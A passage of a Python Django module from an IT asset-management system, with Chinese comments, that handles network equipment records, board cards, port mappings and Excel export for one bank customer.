equipment_obj.factory else \"\",\n manageip=equipment_obj.manageip,\n powertype=equipment_obj.powertype,\n usetype=equipment_obj.usetype,\n staffs=base.get_asset_staffs_str(equipment_obj),\n portmapcount=_get_portmapping_count(equipment_obj),\n changeperm=True,\n delperm=True)\n _result_list.append(equipment_info)\n page_split_result.update({\"record\": _result_list})\n except Exception as e:\n logger.error(e)\n page_split_result.update({\"num_pages\": 1, \"curr_page\": 1, \"total_count\": 0})\n\n finally:\n result[\"data\"] = page_split_result\n return result\n\n\ndef _get_portmapping_count(equipment_obj):\n \"\"\"\n 获取网络设备的端口隐射数,删除设备时根据端口做判断,有端口隐射信息的无法删除\n :return:\n \"\"\"\n map_count = 0\n try:\n if not equipment_obj:\n pass\n else:\n # 获取所有板卡对象\n e_card = equipment_obj.related_card.select_related()\n if e_card.count() > 0:\n card_id_list = [c.id for c in e_card]\n # 获取所有板卡的端口信息\n c_ports = models.PortList.objects.filter(flag=2, object_pk__in=card_id_list)\n # 获取该设备的板卡的端口隐射数\n map_count = models.PortMapping.objects.filter(\n Q(localport__in=c_ports) | Q(targetport__in=c_ports)).count()\n except Exception as e:\n logger.error(e)\n\n return map_count\n\n\ndef _load_equipment_list(conditions, custid, perm_id_list=None):\n \"\"\"\n 根据条件获取所有设备信息列表\n :type perm_id_list: 允许访问的设备ID列表(权限控制)\n :param conditions: 条件\n :return:\n \"\"\"\n record_list = list\n try:\n if not conditions and perm_id_list is None:\n # 如果未加条件或superuser\n record_list = models.Equipment.objects.filter(cust_id=custid)\n else:\n if perm_id_list is None: # superuser\n record_list = models.Equipment.objects.filter(Q(model__contains=conditions) |\n Q(sn__contains=conditions) |\n Q(assetname__contains=conditions) |\n Q(manageip__contains=conditions) |\n Q(netarea__name__contains=conditions) |\n Q(room__name__contains=conditions) |\n Q(cabinet__contains=conditions) |\n Q(assettype__name__contains=conditions),\n cust_id=custid)\n else:\n # 获取指定权限下的设备信息\n record_list = models.Equipment.objects.filter(Q(model__contains=conditions) |\n Q(sn__contains=conditions) |\n Q(assetname__contains=conditions) |\n Q(manageip__contains=conditions) |\n Q(netarea__name__contains=conditions) |\n Q(room__name__contains=conditions) |\n Q(cabinet__contains=conditions) |\n Q(assettype__name__contains=conditions),\n cust_id=custid,\n id__in=perm_id_list)\n except Exception as e:\n logger.error(e)\n\n return record_list\n\n\ndef get_asset_details(asset_id):\n \"\"\"\n 获取设备的详细信息\n :param asset_id: 设备ID\n :return: 字典格式数据\n \"\"\"\n result = dict()\n data = response_format()\n try:\n equipment_obj = models.Equipment.objects.get(id=asset_id)\n equipment_info = _equipment_details(equipment_obj)\n equipment_exten_fields = _get_extend_field_values(equipment_obj)\n equipment_staffs = _equipments_staffs_details(equipment_obj)\n equipment_cards = _equipment_card_details(equipment_obj)\n result.update({\"server\": equipment_info, \"staffs\": equipment_staffs, \"card\": equipment_cards,\n \"extend\": equipment_exten_fields})\n data[\"data\"] = result\n # data = dict(data=result, status=True, error=\"\")\n except ObjectDoesNotExist as e:\n data[\"info\"] = \"未找到指定的设备信息\"\n data[\"status\"] = False\n logger.error(e)\n return data\n\n\ndef _equipment_details(equipment_obj):\n \"\"\"\n 设备详情,页面展示列表详情时用\n :param equipment_obj: 设备对象\n :return:\n \"\"\"\n try:\n _result = dict(id=equipment_obj.id, assetname=equipment_obj.assetname,\n assetno=equipment_obj.assetno, sn=equipment_obj.sn,\n assettype=equipment_obj.assettype.name if equipment_obj.assettype else \"\",\n room=equipment_obj.room.name if equipment_obj.room else \"\",\n roomaddr=equipment_obj.room.address if equipment_obj.room else \"\",\n cabinet=equipment_obj.cabinet,\n tradedate=datetime.strftime(equipment_obj.tradedate,\n \"%Y-%m-%d\") if equipment_obj.tradedate else \"\",\n expiredate=datetime.strftime(equipment_obj.expiredate,\n \"%Y-%m-%d\") if equipment_obj.expiredate else \"\",\n factory=equipment_obj.factory.name if equipment_obj.factory else \"\",\n provider=equipment_obj.provider.name if equipment_obj.provider else \"\",\n serviceprovider=equipment_obj.serviceprovider.name if equipment_obj.serviceprovider else \"\",\n model=equipment_obj.model, powertype=equipment_obj.powertype,\n usetype=equipment_obj.usetype,\n netarea=equipment_obj.netarea.name if equipment_obj.netarea else \"\",\n status=equipment_obj.status.status if equipment_obj.status else \"\",\n manageip=equipment_obj.manageip, portcount=equipment_obj.portcount,\n slotindex=equipment_obj.slotindex, remark=equipment_obj.remark\n )\n return _result\n except Exception as e:\n logger.error(e)\n return None\n\n\ndef _get_extend_field_values(equipment_obj):\n \"\"\"\n 获取网络设备的扩展(自定义属性)信息\n :param equipment_obj: 设备对象\n :return: 扩展属性字典[{'label':'IOS版本','value':'v4.00.18,build0689b689,140731'},...]\n \"\"\"\n _result = list()\n try:\n # 获取所有自定义字段信息\n customer_fields_obj = common.get_table_extend_fields(equipment_obj.cust_id, \"Equipment\")\n # 获取各字段的值\n if len(customer_fields_obj) > 0:\n for field in customer_fields_obj:\n field_label = field.get(\"label\")\n field_value = getattr(equipment_obj, field.get(\"to_field\"))\n _result.append({'label': field_label, 'value': field_value})\n except Exception as e:\n logger.error(e)\n return _result\n\n\ndef _equipments_staffs_details(equipment_obj):\n \"\"\"\n 获取设备资产的联系人信息\n :param equipment_obj: 资产对象\n :return:\n \"\"\"\n _staffs_list = list()\n staffs_obj_List = equipment_obj.related_staffs.select_related()\n if staffs_obj_List.count() > 0:\n for staffs_obj in staffs_obj_List:\n _staff_dict = dict(id=staffs_obj.id,\n staff_id=staffs_obj.staff_id,\n name=staffs_obj.staff.name,\n mobile=staffs_obj.staff.mobile,\n tel=staffs_obj.staff.tel,\n email=staffs_obj.staff.email,\n role=staffs_obj.role.role_name if staffs_obj.role else \"\",\n remark=staffs_obj.remark\n )\n _staffs_list.append(_staff_dict)\n return _staffs_list\n\n\ndef _equipment_card_details(equipment_obj):\n \"\"\"\n 获取网络设备对应的板卡及端口映射关系\n :param equipment_obj: 所属板卡对象\n :return: 板卡信息[{\"assetno\":\"4938493\",\"sn\":\"sn0001\",\"slot\":1,\"model\":\"xxx\",\n \"port\":[{\"localport\":\"port0\",\"targetport\":\"pppp\",\"targettype\":\"host001:网卡(网卡0)},{},{} ]}, {} ]\n \"\"\"\n card_list = list()\n try:\n all_board_card = models.EquipmentBoardCard.objects.filter(equipment=equipment_obj)\n for card_obj in all_board_card:\n # 网络设备的板卡信息\n card_info = dict(id=card_obj.id, assetno=card_obj.assetno, sn=card_obj.sn, cardname=card_obj.cardname,\n slot=card_obj.slot, model=card_obj.model, remark=card_obj.remark)\n card_ports = _equipment_port_list(card_obj)\n # print(card_ports)\n card_info.update({\"portcount\": len(card_ports.get(\"ports\"))})\n card_info.update(card_ports)\n card_list.append(card_info)\n\n return card_list\n except Exception as e:\n logger.error(e)\n return \"\"\n\n\ndef _equipment_port_list(card_obj):\n \"\"\"\n 获取板卡对应的端口以及端口的映射信息\n :param card_obj:\n :return: 返回端口映射表\n \"\"\"\n port_map_detail = dict(ports=list(), maps=list())\n try:\n # 获取该板卡下的所有端口信息\n ports_objs = models.PortList.objects.filter(flag=2, object_pk=card_obj.id).all()\n # 获取端口映射信息\n if ports_objs.count() > 0:\n port_maps = models.PortMapping.objects.filter(Q(localport__in=ports_objs) | Q(targetport__in=ports_objs))\n # 加载端口信息\n for port in ports_objs:\n if port.related_local.select_related().count() > 0 or port.related_target.select_related().count() > 0:\n port_map_detail[\"ports\"].append(dict(id=port.id, portname=port.portname, porttype=port.porttype,\n vlan=port.vlan, remark=port.remark, hasmap=1))\n else:\n port_map_detail[\"ports\"].append(dict(id=port.id, portname=port.portname, porttype=port.porttype,\n vlan=port.vlan, remark=port.remark, hasmap=0))\n\n if port_maps.count() > 0:\n for mapping in port_maps:\n # 如果映射关系表的端口是本端\n if mapping.localport in ports_objs:\n target_port = mapping.targetport\n local_port = mapping.localport\n else:\n target_port = mapping.localport\n local_port = mapping.targetport\n # 获取映射信息\n if target_port:\n # 获取对端设备的详细信息\n target_card_info = _get_card_by_portid(target_port.id)\n map_info = dict(targetportid=target_port.id, targetportname=target_port.portname,\n targetporttype=target_port.porttype, targetasset=target_card_info,\n remark=target_port.remark, mapid=mapping.id)\n else:\n map_info = dict(targetportid=\"\", targetportname=\"\", targetporttype=\"\", targetasset=\"\",\n mapid=mapping.id)\n\n if local_port:\n map_info.update(dict(localportname=local_port.portname))\n\n port_map_detail[\"maps\"].append(map_info)\n else:\n pass\n\n except Exception as e:\n logger.error(e)\n return port_map_detail\n\n\ndef _get_card_by_portid(port_id):\n \"\"\"\n 通过portlist表中的id获取所属的设备的信息\n :param port_id: 端口id\n :return: 返回设备的信息(str)\n \"\"\"\n try:\n port_obj = models.PortList.objects.get(id=port_id)\n if port_obj.flag == 1:\n # 服务器资产的板卡端口\n card_obj = models.ServerBoardCard.objects.get(id=port_obj.object_pk)\n asset_info = \"{0}:{1}\".format(card_obj.server.hostname,\n \"网卡\" if card_obj.cardtype == 1 else \"存储卡\")\n\n if port_obj.flag == 2:\n # 设备资产的板卡端口\n card_obj = models.EquipmentBoardCard.objects.get(id=port_obj.object_pk)\n asset_info = \"{0}:{1}({2})\".format(card_obj.equipment.assetname, card_obj.equipment.model,\n card_obj.cardname)\n\n return asset_info\n except Exception as e:\n logger.error(e)\n return \"\"\n\n\ndef get_asset_base_info(sid):\n \"\"\"\n 获取设备资产的信息,对于关联关系的仅显示id,编辑时用\n :param sid: 设备资产id\n :return:\n \"\"\"\n try:\n equipment_obj = models.Equipment.objects.get(id=sid)\n # 获取基础数据\n equipment_info = dict(id=equipment_obj.id,\n assetname=equipment_obj.assetname,\n assetno=equipment_obj.assetno, sn=equipment_obj.sn,\n assettype=equipment_obj.assettype_id, room=equipment_obj.room_id,\n cabinet=equipment_obj.cabinet, powertype=equipment_obj.powertype,\n usetype=equipment_obj.usetype,\n datacenter=equipment_obj.room.center_id if equipment_obj.room else \"\",\n tradedate=datetime.strftime(equipment_obj.tradedate,\n \"%Y-%m-%d\") if equipment_obj.tradedate else \"\",\n expiredate=datetime.strftime(equipment_obj.expiredate,\n \"%Y-%m-%d\") if equipment_obj.expiredate else \"\",\n factory=equipment_obj.factory_id, model=equipment_obj.model,\n provider=equipment_obj.provider_id, serviceprovider=equipment_obj.serviceprovider_id,\n netarea=equipment_obj.netarea_id, status=equipment_obj.status_id,\n manageip=equipment_obj.manageip, portcount=equipment_obj.portcount,\n slotindex=equipment_obj.slotindex, remark=equipment_obj.remark\n )\n # 获取用户自定义扩展字段的数据\n extend_fields = common.get_table_extend_fields(equipment_obj.cust_id, equipment_obj._meta.object_name)\n if len(extend_fields) > 0:\n for field in extend_fields:\n equipment_info.update({field.get(\"to_field\"): getattr(equipment_obj, field.get(\"to_field\"))})\n return equipment_info\n except ObjectDoesNotExist as e:\n logger.error(\"未找到指定ID的网络设备资产信息\")\n return \"\"\n except Exception as e:\n logger.error(e)\n return \"\"\n\n\ndef load_related_base_configuration(custid):\n \"\"\"\n 获取编辑或添加时依赖的基表数据\n :return: 字典\n \"\"\"\n related_tables = [\"BaseDataCenter\", \"BaseMachineRoom\", \"BaseNetArea\",\n \"BaseAssetCabinet\", \"BaseFactory\", \"BaseAssetStatus\", \"BaseEquipmentType\"]\n related_data = base.get_base_data(custid, related_tables)\n # 获取自定义的扩展字段\n extend_field = common.get_table_extend_fields(custid, \"Equipment\")\n related_data.update({\"extend\": extend_field})\n return related_data\n\n\n@operator_audit_decorator(\"Equipment\")\ndef edit_asset(data):\n \"\"\"\n 添加 和 修改设备资产信息\n :param action: 要执行的动作 edit / add\n :param sid: 如果是edit, 资产id\n :param data: post的数据\n :return:\n \"\"\"\n result = response_format()\n try:\n # print(\"e data:\", data)\n asset_data = data.get(\"value\", \"\")\n action = data.get(\"action\")\n sid = asset_data.get(\"id\", 0)\n user = data.get(\"user\")\n custid = data.get(\"custid\")\n\n if asset_data:\n asset_data = common.filter_dict(asset_data)\n # print(asset_data)\n if action == \"edit\":\n asset_data.update(dict(updateuser=user.username, updatedate=datetime.now()))\n asset_obj = models.Equipment.objects.filter(id=int(sid))\n if asset_obj.first().manageip != asset_data.get(\"manageip\", \"\"):\n result = data_validate(asset_data.get(\"sn\", \"\"), asset_data.get(\"manageip\", \"\"), custid, sid)\n if result[\"status\"]:\n common.change_ip_status(custid, asset_obj.first().manageip, \"ALLOCATED\")\n common.change_ip_status(custid, asset_data.get(\"manageip\", \"\"), \"USED\", asset_obj.first().__str__())\n\n asset_obj.update(**asset_data)\n result[\"info\"] = \"修改成功\"\n else:\n asset_obj.update(**asset_data)\n result[\"info\"] = \"修改成功\"\n\n elif action == \"new\":\n # 检查sn是否重复\n result = data_validate(asset_data.get(\"sn\", \"\"), asset_data.get(\"manageip\", \"\"), custid)\n if result[\"status\"]:\n asset_data.update(dict(id=base.nextid(models.Equipment._meta.db_table, custid),\n updateuser=user.username,\n createuser=user.username,\n cust_id=custid))\n asset_no = common.create_assno()\n asset_data.update({\"assetno\": asset_no})\n new_asset = models.Equipment.objects.create(**asset_data)\n # 修改IP地址的使用状态为已使用\n common.change_ip_status(custid, asset_data.get(\"manageip\"), \"USED\", new_asset.__str__())\n result[\"data\"] = dict(id=new_asset.id, equipmentname=new_asset.assetname)\n result[\"info\"] = \"添加成功\"\n\n elif action == \"delete\":\n asset_obj = models.Equipment.objects.filter(id=sid)\n if not asset_obj:\n result[\"info\"] = \"未找到指定记录\"\n result[\"status\"] = False\n result[\"category\"] = \"error\"\n else:\n # 获取该网络设备记录的所有依赖表记录\n related_data = load_asset_related_data(sid)\n # 保存历史数据\n base.save_del_history(\"Equipment\", related_data, user, custid)\n # 删除板卡端口数据\n if len(json.loads(related_data).get(\"PortList\", [])) > 0:\n port_id_list = list()\n for port in json.loads(related_data).get(\"PortList\"):\n port_id_list.append(port.get(\"id\"))\n # print(port_id_list)\n models.PortList.objects.filter(id__in=port_id_list).delete()\n # 修改IP地址的使用状态为待回收\n common.change_ip_status(custid, asset_obj.first().manageip, \"RECOVER\")\n # 删除记录\n asset_obj.delete()\n result[\"info\"] = \"删除成功\"\n except Exception as e:\n result[\"status\"] = False\n result[\"category\"] = \"error\"\n result[\"info\"] = \"系统错误!\"\n logger.error(e)\n return result\n\n\ndef data_validate(sn, manageip, custid, obj_id=None):\n \"\"\"\n 验证提交的sn和ip地址的合法性\n :param sn:\n :param manageip:\n :param custid:\n :param obj_id:\n :return:\n \"\"\"\n result = response_format()\n if _check_exists(sn, manageip, custid, obj_id):\n result[\"info\"] = \"SN或管理IP地址重复!\"\n result[\"category\"] = \"warning\"\n result[\"status\"] = False\n else:\n if not common.ip_allocated(manageip, custid):\n result[\"info\"] = \"管理IP未分配或已被使用!\"\n result[\"category\"] = \"error\"\n result[\"status\"] = False\n else:\n result[\"status\"] = True\n return result\n\n\ndef _check_exists(sn, manageip, custid, obj_id=None):\n \"\"\"\n 添加和修改网络设备时检测时检测重复记录,主要检测sn、manageip\n :param sn: sn编号\n :param manageip: 管理IP\n :param custid: 客户编号,同一个客户下的不可以重复,不同客户的可以重复\n :param obj_id: 对象id,编辑的时候判断除自身之外的其它记录\n :return: 有重复记录True / 无重复记录False\n \"\"\"\n exists_flag = False\n try:\n eq = models.Equipment.objects.filter(sn=sn, manageip=manageip, cust_id=custid)\n if obj_id:\n eq = eq.exclude(id=obj_id)\n if eq.count() > 0:\n exists_flag = True\n except Exception as e:\n logger.error(e)\n return exists_flag\n\n\ndef export_excel(custid, **kwargs):\n \"\"\"\n 导出设备excel功能\n :param kwargs:\n :return:\n \"\"\"\n from afcat.cmdb.libs.excel import Excel\n conditions = kwargs.get(\"conditions\", \"\")[0]\n e_obj_list = _load_equipment_list(conditions, custid)\n try:\n # create excel file object\n excel_obj = Excel()\n _excel_export_data(excel_obj, e_obj_list)\n except Exception as e:\n logger.error(e)\n finally:\n excel_obj.close()\n return excel_obj.file\n\n\n# def _excel_export_main_info(excel_obj, record_obj_list):\n# \"\"\"\n# 导出网络设备的基本信息\n# :return:\n# \"\"\"\n# excel_title = [\n# (\"序号\", 5), (\"设备名称\", 20), (\"设备类型\", 15), (\"应用用途\", 25), (\"管理IP\", 15), (\"所属机房\", 25), (\"所在机柜\", 10),\n# (\"U位\", 10), (\"设备型号\", 20), (\"序列号\", 25), (\"电源数量\", 10), (\"联系人\", 20), (\"网络区域\", 20), (\"厂商\", 25),\n# (\"购买日期\", 15), (\"过保日期\", 15), (\"状态\", 15), (\"备注\", 20)\n# ]\n# excel_rows = list()\n# row_index = 1\n# try:\n# sheet_obj = excel_obj.create_sheet(u\"网络设备\")\n# for e_obj in record_obj_list:\n# row = []\n# info = get_asset_details(e_obj.id)[\"data\"]\n# asset_info = info.get(\"server\", \"\")\n# asset_staff_info = info.get(\"staffs\", \"\")\n# extend_field = common.list_to_dict(info.get(\"extend\"), 'label', 'value') # 扩展字段\n# print(extend_field)\n# # index\n# row.append(row_index)\n# # assetname\n# row.append(asset_info.get(\"assetname\"))\n# # assettype\n# row.append(asset_info.get(\"assettype\"))\n# # assetusetype\n# row.append(asset_info.get(\"usetype\"))\n# # manageip\n# row.append(asset_info.get(\"manageip\"))\n# # room\n# row.append(asset_info.get(\"room\"))\n# # cabinet\n# row.append(asset_info.get(\"cabinet\"))\n# # slotindex\n# row.append(asset_info.get(\"slotindex\"))\n# # model\n# row.append(asset_info.get(\"model\"))\n# # sn\n# row.append(asset_info.get(\"sn\"))\n# # powercount\n# row.append(asset_info.get(\"powertype\"))\n# # staffs\n# row.append(common.convert_dict_to_str(asset_staff_info, [\"name\", \"role\", \"mobile\"], \"/\"))\n# # netarea\n# row.append(asset_info.get(\"netarea\"))\n# # factory\n# row.append(asset_info.get(\"factory\"))\n# # tradedate\n# row.append(asset_info.get(\"tradedate\"))\n# # expiredate\n# row.append(asset_info.get(\"expiredate\"))\n# # status\n# row.append(asset_info[\"status\"])\n# # remark\n# row.append(asset_info[\"remark\"])\n#\n# excel_rows.append(row)\n#\n# row_index += 1\n#\n# excel_obj.write_title(excel_title, sheet_obj)\n# excel_obj.write_row(excel_rows, sheet_obj)\n# except Exception as e:\n# logger.error(e)\n\n\ndef _excel_export_data(excel_obj, record_obj_list):\n \"\"\"\n 专门针对太原银行进行定制的excel导出\n :param excel_obj:\n :param record_obj_list:\n :return:\n \"\"\"\n excel_title = [\n (\"序号\", 5), (\"监控策略\", 20), (\"监控时间段\", 15), (\"设备管理IP\", 15), (\"团体字\", 15), (\"责任人\", 20), (\"逻辑区域\", 15),\n (\"机房位置\", 20), (\"设备类型\", 10), (\"管理组\", 5), (\"管理机构\", 10), (\"所属机构\", 10), (\"地域\", 10), (\"监控需求\", 10),\n (\"特殊需求\", 10), (\"别名\", 10), (\"用途\", 8), (\"房间位置\", 20), (\"机柜编号\", 10), (\"机内位置\", 10), (\"带内管理地址\", 10),\n (\"带外管理地址\", 10), (\"所属环境\", 10), (\"服务开始日期\", 10), (\"过保时间\", 10), (\"供应商\", 5), (\"服务提供商\", 10),\n (\"状态\", 8), (\"服务级别\", 8), (\"厂商\", 10), (\"设备型号\", 8), (\"设备序列号\", 20), (\"名称\", 20), (\"IOS版本\", 20)\n ]\n excel_rows = list()\n row_index = 1\n try:\n sheet_obj = excel_obj.create_sheet(u\"网络设备\")\n for e_obj in record_obj_list:\n row = []\n info = get_asset_details(e_obj.id)[\"data\"]\n print(info)\n asset_info = info.get(\"server\", \"\")\n asset_staff_info = info.get(\"staffs\", \"\")\n extend_field = common.list_to_dict(info.get(\"extend\"), 'label', 'value') # 扩展字段\n # index\n row.append(row_index)\n # 监控策略\n row.append(extend_field.get(excel_title[1][0]))\n # 监控时间段\n row.append(extend_field.get(excel_title[2][0]))\n # manageip\n row.append(asset_info.get(\"manageip\"))\n # 团体字\n row.append(extend_field.get(excel_title[4][0]))\n # staffs\n row.append(common.convert_dict_to_str(asset_staff_info, [\"name\", \"role\", \"mobile\"], \"/\"))\n # 逻辑区域\n row.append(extend_field.get(excel_title[6][0]))\n # room\n row.append(asset_info.get(\"room\"))\n # assettype\n row.append(asset_info.get(\"assettype\"))\n # 管理组\n row.append(extend_field.get(excel_title[9][0]))\n # 管理机构\n row.append(extend_field.get(excel_title[10][0]))\n # 所属机构\n row.append(extend_field.get(excel_title[11][0]))\n # 地域\n row.append(extend_field.get(excel_title[12][0]))\n # 监控需求\n row.append(extend_field.get(excel_title[13][0]))\n # 特殊需求\n row.append(extend_field.get(excel_title[14][0]))\n # 别名\n row.append(extend_field.get(excel_title[15][0]))\n # assetusetype\n row.append(asset_info.get(\"usetype\"))\n # roomaddress\n row.append(asset_info.get(\"roomaddr\"))\n # cabinet\n row.append(asset_info.get(\"cabinet\"))\n # slotindex\n row.append(asset_info.get(\"slotindex\"))\n # 带内地址\n row.append(extend_field.get(excel_title[20][0]))\n # 带外地址\n row.append(extend_field.get(excel_title[21][0]))\n # netarea\n row.append(asset_info.get(\"netarea\"))\n # tradedate\n row.append(asset_info.get(\"tradedate\"))\n # expiredate\n row.append(asset_info.get(\"expiredate\"))\n # provider\n row.append(asset_info.get(\"provider\"))\n # service provider\n row.append(asset_info.get(\"serviceprovider\"))\n # status\n row.append(asset_info[\"status\"])\n # 服务级别\n row.append(extend_field.get(excel_title[28][0]))\n # factory\n row.append(asset_info.get(\"factory\"))\n # model\n row.append(asset_info.get(\"model\"))\n # sn\n row.append(asset_info.get(\"sn\"))\n # assetname\n row.append(asset_info.get(\"assetname\"))\n # remark\n row.append(extend_field.get(excel_title[33][0]))\n\n excel_rows.append(row)\n\n row_index += 1\n\n excel_obj.write_title(excel_title, sheet_obj)\n excel_obj.write_row(excel_rows, sheet_obj)\n except Exception as e:\n logger.error(e)\n\n\ndef load_asset_related_data(eid):\n \"\"\"\n 获得所有设备资产及关联数据的值\n :param eid: 资产设备id\n :return: json格式\n \"\"\"\n all_data = dict()\n try:\n # 获取设备的记录数据\n asset_objs = models.Equipment.objects.get(id=eid)\n equipment_info = base.get_single_obj_record(asset_objs)\n all_data.update({\"Equipment\": equipment_info})\n\n # 获取g该记录关联的所有数据\n related_data = common.object_related_data(\"Equipment\", eid)\n all_data.update(related_data)\n\n # 获取网络设备记录中关联板卡的端口信息\n # print(all_data)\n card_port_info = list()\n for card in asset_objs.related_card.select_related():\n portlist_obj = models.PortList.objects.filter(object_pk=card.id, flag=2)\n for port_obj in portlist_obj:\n card_port_info.append(base.get_single_obj_record(port_obj))\n\n all_data.update({\"PortList\": card_port_info})\n except Exception as e:\n logger.error(e)\n\n return json.dumps(all_data, cls=common.CJsonEncoder)\n\n\ndef get_id_list(type_obj_list, custid):\n \"\"\"\n 根据设备类型获取设备类型下的所有设备id\n :param type_obj_list: 设备类型对象列表\n :return: 设备id列表\n \"\"\"\n id_list = list()\n equipments = models.Equipment.objects.filter(assettype__in=type_obj_list, cust_id=custid).values(\"id\")\n for e in equipments:\n id_list.append(e.get(\"id\", 0))\n return list(set(id_list))\n\n\n@operator_audit_decorator(\"EquipmentBoardCard\")\ndef post_boardcard(post_data, user):\n \"\"\"\n 添加,修改,删除网络设备板卡信息\n :param post_data:\n :return:\n \"\"\"\n result = response_format()\n try:\n action = post_data.get(\"action\")\n values = post_data.get(\"value\")\n custid = post_data.get(\"custid\")\n values = common.filter_dict(values)\n if action == \"new\":\n if \"ports\" in values.keys():\n ports = values.pop(\"ports\")\n else:\n ports = \"\"\n # 更新id、assetno等信息\n values.update(dict(id=base.nextid(models.EquipmentBoardCard._meta.db_table, custid),\n assetno=common.create_assno(),\n createuser=user.username, updateuser=user.username))\n # 创建板卡信息\n boardcard = models.EquipmentBoardCard.objects.create(**values)\n # 插入端口到端口表\n if ports:\n portlist = ports.split(\",\")\n portlist.sort()\n for port in portlist:\n if port:\n port_obj = models.PortList.objects.create(\n **dict(id=base.nextid(models.PortList._meta.db_table, custid),\n object_pk=boardcard.id,\n portname=port,\n flag=2))\n new_card_info = dict(id=boardcard.id, assetno=boardcard.assetno, sn=boardcard.sn, model=boardcard.model,\n cardname=boardcard.cardname, slot=boardcard.slot, remark=boardcard.remark)\n # 返回卡端口及映射信息\n new_card_info.update(_equipment_port_list(boardcard))\n result[\"info\"] = \"添加成功\"\n result[\"data\"] = new_card_info\n\n if action == \"edit\":\n cid = values.get(\"id\", 0)\n if not cid:\n result[\"info\"] = \"参数错误\"\n result[\"category\"] = \"error\"\n result[\"status\"] = False\n return result\n else:\n card_obj = models.EquipmentBoardCard.objects.filter(id=cid)\n card_obj.update(**values)\n result[\"info\"] = \"修改成功\"\n\n if action == \"delete\":\n cid = values.get(\"id\", 0)\n # 获取板卡对象\n card_obj = models.EquipmentBoardCard.objects.filter(id=cid).first()\n # 删除板卡对应的所有端口,同时关联的所有映射表也同时删除\n models.PortList.objects.filter(object_pk=card_obj.id, flag=2).delete()\n # 删除卡记录\n card_obj.delete()\n result[\"info\"] = \"删除成功\"\n except Exception as e:\n logger.error(e)\n result[\"info\"] = \"系统错误\"\n result[\"category\"] = \"error\"\n return result\n\n\ndef get_port_map_info(request_data, custid):\n \"\"\"\n 根据请求的设备类型,返回端口信息,模糊搜索对应设备\n :param request_data: {\"porttype\":1, \"condition\":\"xxxxxx\"}\n :return:\n \"\"\"\n target_port_list = list()\n try:\n card_dict_list = dict()\n porttype = int(request_data.get(\"porttype\", 2))\n condition = request_data.get(\"condition\", \"\")\n if porttype == 1:\n # 主机设备,获取模糊搜索条件的设备下的所有板卡信息\n servers_obj = models.Servers.objects.filter(hostname__contains=condition, cust_id=custid)\n for serv in servers_obj:\n serv_card_obj = serv.related_card.select_related()\n for card in serv_card_obj:\n card_dict_list.update({card.id: \"{0}:{1}\".format(serv.hostname,\n \"网卡\" if card.cardtype == 1 else \"存储卡\")})\n if porttype == 2:\n # 网络设备端口\n equipment_obj = models.Equipment.objects.filter(\n Q(sn__contains=condition) | Q(assetname__contains=condition), cust_id=custid)\n for equipment in equipment_obj:\n ecard_obj = equipment.related_card.select_related()\n for card in ecard_obj:\n card_dict_list.update({card.id: \"{0}:{1}({2})\".format(equipment.assetname,\n equipment.model,\n card.cardname)})\n # 获取已经建立匹配的端口ID\n mapped_id = list()\n all_map_rec = models.PortMapping.objects.all().values(\"localport_id\", \"targetport_id\")\n for rec in all_map_rec:\n mapped_id.append(rec.get(\"localport_id\"))\n mapped_id.append(rec.get(\"targetport_id\"))\n\n # 获取端口信息\n port_list = models.PortList.objects.filter(flag=porttype, object_pk__in=list(card_dict_list.keys()),\n ).exclude(id__in=mapped_id)\n for port in port_list:\n target_port_list.append(dict(id=port.id, portname=port.portname,\n portasset=card_dict_list.get(port.object_pk, \"\"),\n porttype=port.porttype))\n\n except Exception as e:\n logger.error(e)\n\n return target_port_list\n\n\n@operator_audit_decorator(\"PortMapping\")\ndef post_port_map_info(request_data):\n \"\"\"\n 添加、编辑、删除端口映射信息,提交的数据包括:板卡ID,端口名\n :param request_data: {\"value\":{\"portname\":\"E1/0\",\"card_id\":10011,\"targetport_id\":10012,\"remark\":\"xxx\"},\n \"action\":\"edit/new/delete\",\n }\n :return:\n \"\"\"\n result = response_format()\n try:\n # 获取端口对应的ID\n post_data = request_data.get(\"value\", {})\n action = request_data.get(\"action\", \"\")\n custid = request_data.get(\"custid\")\n if not post_data or not action:\n result[\"info\"] = \"参数错误\"\n result[\"category\"] = \"error\"\n result[\"status\"] = False\n else:\n if action == \"delete\":\n models.PortMapping.objects.filter(id=int(post_data.get(\"id\"))).delete()\n result[\"info\"] = \"删除成功\"\n else:\n # 获取端口ID\n local_port = models.PortList.objects.filter(object_pk=int(post_data.get(\"card_id\", 0)),\n portname=post_data.get(\"portname\").strip(),\n flag=2).first()\n if not local_port:\n result[\"info\"] = \"未找到指定端口\"\n result[\"status\"] = False\n else:\n if action == \"new\":\n # 查找本地端口或对端端口是否已经存在映射\n check_port_id = [local_port.id, int(post_data.get(\"targetport_id\", 0))]\n mapped_obj = models.PortMapping.objects.filter(Q(localport_id__in=check_port_id) |\n Q(targetport_id__in=check_port_id),\n id__startswith=custid\n )\n if mapped_obj.count() > 0:\n # 本端或对端端口已经有映射关系\n result[\"info\"] = \"指定端口已建立映射关系\"\n result[\"category\"] = \"warning\"\n result[\"status\"] = True\n else:\n new_obj = models.PortMapping.objects.create(\n **dict(id=base.nextid(models.PortMapping._meta.db_table, custid),\n localport_id=local_port.id,\n targetport_id=int(post_data.get(\"targetport_id\", 0)),\n remark=post_data.get(\"remark\", \"\"))\n )\n result[\"info\"] = \"添加成功\"\n result[\"data\"] = dict(mapid=new_obj.id, id=new_obj.id, localport_id=new_obj.localport_id,\n targetport_id=new_obj.targetport_id)\n\n if action == \"edit\":\n edit_data = dict(id=post_data.get(\"id\"), localport_id=local_port.id,\n targetport_id=int(post_data.get(\"targetport_id\", 0)),\n remark=post_data.get(\"remark\", \"\"))\n models.PortMapping.objects.filter(id=int(post_data.get(\"id\"))).update(**edit_data)\n\n result[\"info\"] = \"修改成功\"\n\n except Exception as e:\n logger.error(e)\n result[\"info\"] = \"执行错误\"\n result[\"status\"] = False\n print(result)\n return result\n\n\n# @operator_audit_decorator(\"Equipment\")\n# def import_excel(request_data, excel_data):\n# \"\"\"\n# 导入Excel文件到数据库\n# :param excel_data:\n# :param request_data:\n# :return:\n# \"\"\"\n# save_record = list()\n# fail_record = list()\n# import_result = response_format()\n# custid = request_data.get(\"custid\")\n# print(excel_data)\n# try:\n# base_table = [('BaseEquipmentType', ['name', 'id']), ('BaseDataCenter', ['name', 'id']),\n# ('BaseMachineRoom', ['name', 'id']), ('Staffs', ['name', 'id']),\n# ('BaseAssetStatus', ['status', 'id']), ('BaseNetArea', ['name', 'id']),\n# ('BaseFactory', ['name', 'id'])\n# ]\n# # 导入数据中的下拉框值对应的ID字典\n# base_table_id_dict = base.convert_table_field(base_table, 0, 1, 